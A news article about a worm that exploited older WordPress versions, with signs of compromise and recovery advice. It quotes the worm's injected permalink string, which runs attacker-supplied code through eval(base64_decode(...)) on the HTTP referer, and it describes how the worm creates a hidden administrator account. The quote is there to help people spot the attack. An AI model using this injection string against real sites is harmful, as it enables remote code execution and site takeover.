14 DAY TRIAL // A Web worm that spreads by exploiting a vulnerability in older versions of WordPress has put the blogosphere in alert mode. Once it compromises a vulnerable installation, the worm begins to taint older blog entries with malicious links and, in some cases, it can even destroy data.
Reports of hacked, WordPress-powered blogs started flowing in since late last week, and there seems to be some tell-tale signs of a possible compromise. According to Lorelee's blog about blogging, this worm modifies the structure of WordPress pretty permalinks to something like example.com/category/post-title/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/. "The keywords are 'eval' and 'base64_decode,'" she points out.
The vulnerability exploited by this worm allows it to create a secondary, hidden Administrator account. Therefore, seeing something like "Administrator (2)" in the user list is a good indication that something has gone terribly wrong. Other names that don't belong there can also point to a compromise.
"This particular worm, like many before it, is clever: it registers a user, uses a security bug (fixed earlier in the year) to allow evaluated code to be executed through the permalink structure, makes itself an admin, then uses JavaScript to hide itself when you look at users' page, attempts to clean up after itself, then goes quiet so you never notice while it inserts hidden spam and malware into your old posts," Matt Mullenweg, WordPress co-founder, explains on the platform's official development blog.
According to Matt, the vulnerability exploited in this attack has been patched since WordPress 2.8.3. However, updating to 2.8.4, the latest, stable version, is strongly recommended, as updating is much easier to do than cleaning a compromised blog. As Matt puts it, "Upgrading is taking your vitamins; fixing a hack is open heart surgery."
But what if your blog has already been hacked and you're reading this too late? Well, the quickest and safest way to recover seems to be exporting all content with WordPress' included XML export feature, along with any custom images. Exporting the database is not applicable, as this hack affects it. However, restoring from an old, unaffected database backup, if you happen to keep one, like you normally should, could also be a solution.
It is worth mentioning for less technical users that this threat does not affect third-party-managed blogging services such as those offered on WordPress.com, but do-it-yourself installations using the distributable package available on WordPress.org.